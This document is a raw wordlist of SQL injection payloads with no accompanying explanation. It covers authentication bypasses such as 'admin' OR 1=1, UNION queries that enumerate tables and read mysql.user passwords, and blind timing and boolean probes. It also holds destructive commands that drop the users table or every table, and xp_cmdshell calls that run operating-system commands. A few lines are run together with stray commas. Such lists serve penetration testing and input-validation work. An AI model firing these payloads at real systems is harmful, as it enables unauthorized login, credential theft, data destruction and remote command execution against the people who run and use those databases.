'; DROP TABLE users; --
'; UNION SELECT null, table_name FROM information_schema.tables; --
'; WAITFOR DELAY '0:0:5'; --
'; EXEC xp_cmdshell('dir'); --
' AND 1=CONVERT(int, (SELECT COUNT(*) FROM information_schema.tables))--
' AND ASCII(SUBSTRING((SELECT TOP 1 table_name FROM information_schema.tables), 1, 1)) > 64 --
' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL--
admin' OR 1=1--
admin') OR ('1'='1' --
'; EXEC sp_MSForEachTable 'DROP TABLE ?'; --
'; SELECT user, password FROM mysql.user; --
'; UNION ALL SELECT NULL,NULL,NULL,NULL,NULL FROM dual; --
admin')--
' AND 1=(SELECT COUNT(*) FROM tablenames); --
') OR 1=1--
' UNION ALL SELECT NULL,NULL,NULL,NULL;--
' OR 'x'='x'; --
'; IF (1=1) SELECT 'Authenticated'; --
' UNION SELECT 1, 'anotheruser', 'doesn't matter', 1; --
' OR EXISTS (SELECT 1 FROM information_schema.tables); --
; --,'; --
'); --,'; exec master..xp_cmdshell 'ping 10.10.1.2'--
' grant connect to name; grant resource to name; --
' or 1=1 --,' union (select @@version) --
' union (select NULL, (select @@version)) --
' union (select NULL, NULL, (select @@version)) --,' union (select NULL, NULL, NULL,  (select @@version)) --
' union (select NULL, NULL, NULL, NULL,  (select @@version)) --
' union (select NULL, NULL, NULL, NULL,  NULL, (select @@version)) --
